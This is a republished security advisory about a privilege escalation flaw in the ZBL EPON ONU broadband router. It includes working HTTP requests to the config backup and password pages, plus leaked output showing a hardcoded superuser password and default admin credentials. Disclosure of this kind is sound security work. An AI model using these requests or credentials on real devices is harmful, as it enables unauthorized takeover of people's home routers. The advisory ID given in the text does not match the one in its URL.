ZBL EPON ONU Broadband Router 1.0 Remote Privilege Escalation ≈ Packet Storm – Digitalmunition

Exploit/Advisories no-image-featured-image.png

Published on April 2nd, 2021 📆 | 4885 Views ⚑


ZBL EPON ONU Broadband Router 1.0 Remote Privilege Escalation ≈ Packet Storm

ZBL EPON ONU Broadband Router 1.0 Remote Privilege Escalation Exploit

Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
Product web page: http://www.zblchina.com | http://www.wd-thailand.com
Affected version: Firmwre: V100R001
Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
EONU Hardware Version V3.0
Software: V2.46.02P6T5S
Main Chip: RTL9607
Master Controller, Copyright (c) R&D

Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband

Desc: The application suffers from a privilege escalation
vulnerability. The limited administrative user (admin:admin)
can elevate his/her privileges by sending a HTTP GET request
to the configuration backup endpoint or the password page
and disclose the http super user password. Once authenticated
as super, an attacker will be granted access to additional and
privileged functionalities.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic

Advisory ID: ZSL-2021-5467
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php


Get config file and disclose super pwd:

POST /HG104B-ZG-E.config HTTP/1.1
Connection: keep-alive
Content-Length: 42
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6



Disclose super pwd from system pwd page:

GET /system_password.asp

var webVars = new Array( ‘HG104B-ZG-E’, ‘1’, ‘0’,’2;1;2′);
var sysadmin = new Array(‘600′,’1;super;www168nettv’,’1;admin;admin’);

Source link

Tagged with:

Leave a Reply